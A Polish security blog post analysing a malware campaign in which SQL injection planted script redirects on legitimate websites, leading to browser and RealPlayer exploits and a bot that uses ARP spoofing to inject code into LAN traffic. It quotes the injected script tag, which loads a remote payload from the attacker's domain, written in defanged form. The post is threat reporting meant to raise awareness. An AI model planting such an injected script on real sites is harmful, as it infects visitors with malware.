Jeśli ktoś myślał, że tworzący sieci botnet wynaleźli już wszystko co było do wynalezienia, to się grubo mylił (jak zawsze jeśli chodzi o boty). Nowoczesne boty posiadają możliwość wstrzykiwania złośliwego kodu do stron przeglądanych przez innych użytkowników w sieci LAN. Atak ten wykorzystuje fałszowanie pakietów w sieciach lokalnych zwany: ARP spoofingiem.
Niezidentyfikowana grupa ;] dokonała ataków SQL injection, wstrzykując do wielu legalnych stron WWW (za Google: ponad 4000 wyników), przekierowanie w JavaScripcie, do domeny winzipices.cn. Pod tym adresem, a dokładnie z pomocą kodu: <script src=hxxp://winzipices.cn/X.js></script>
, gdzie zamiast X.js wykorzystywane są pliki: 1.js, 2.js, 3.js, 4.js – użytkownik w zależności od posiadanej wersji przeglądarki stron WWW, zostaje obdarowany prezentami znajdującymi się w dodatkowych oknach typu IFRAME.
W przypadku IE6 użytkownik przekierowywany jest bezpośrednio do pobrania/uruchomienia pliku binarnego oraz dwóch błędów (starego i nowego) w odtwarzaczu multimedialnym RealPlayer. Właściciele IE7 mogą czuć się poszkodowani gdyż dostają jedynie w prezencie podstrony wykorzystujące błędy w RealPlayerze.
Malware bezpośrednio po uruchomieniu, pobiera plik konfiguracyjny zawierający informacje: o kolejnych plikach do pobrania i uruchomienia, adresach URL służących do raportowania, decyzji czy infekować dyski przenośne lub protokół NetBios itp. Do najciekawszych moim skromnym zdaniem należy umiejętność wykorzystania ataku ARP spoofing do wstrzykiwania określonego kodu do stron WWW, obserwowanych przez innych użytkowników sieci LAN.
Zasadniczo wszystko zaczyna mieć ręce i nogi i składać się w jedną logiczną całość. Wielostopniowe ataki, na każdej z możliwych warstw umożliwiają zdobywanie coraz to większej ilości komputerów, które można kontrolować. Bezpieczeństwo naszych komputerów zależy już nie tylko od aktualnych łat zaaplikowanych w systemie i programu antywirusowego, ale także od bezpieczeństwa naszych sąsiadów, od infrastruktury sieciowej, z której korzystamy i jak się okazuję od wielu innych czynników. Propagujmy więc bezpieczeństwo wokół, gdyż zgodnie ze starym przysłowiem: pomagając innym – pomagamy sobie…